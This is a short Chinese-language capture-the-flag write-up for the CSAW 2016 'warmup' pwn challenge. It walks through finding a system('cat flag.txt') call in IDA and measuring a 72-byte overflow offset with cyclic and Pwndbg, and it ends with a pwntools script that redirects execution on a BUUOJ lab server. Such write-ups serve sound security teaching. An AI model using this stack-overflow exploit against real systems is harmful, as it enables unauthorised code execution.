Pwn-warmup_csaw_2016 writeup


 

本題利用了較為基礎的一個棧溢出來獲取系統權限

首先我們打開IDA進行分析,搜索字符串我們可以看到有cat flag.txt的關鍵字樣

 

進入跟蹤,我們可以看到,程序調用了system命令

 

首先我們用cyclic創建一個200字符的字符串,利用它來判斷溢出點到返回地址的偏移

 

 啟動Pwndbg進行調試

 

 由圖可得,根據小端序,'saaa'之前有多少個字符,就是偏移量

 

 寫出腳本

from pwn import*
p=remote('node3.buuoj.cn',29184)#根據靶機不同來進行更改
addr=0x40060d
payload='a'*72+p64(addr)
p.sendline(payload)
p.interactive()

 打通服務器,拿到flag


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM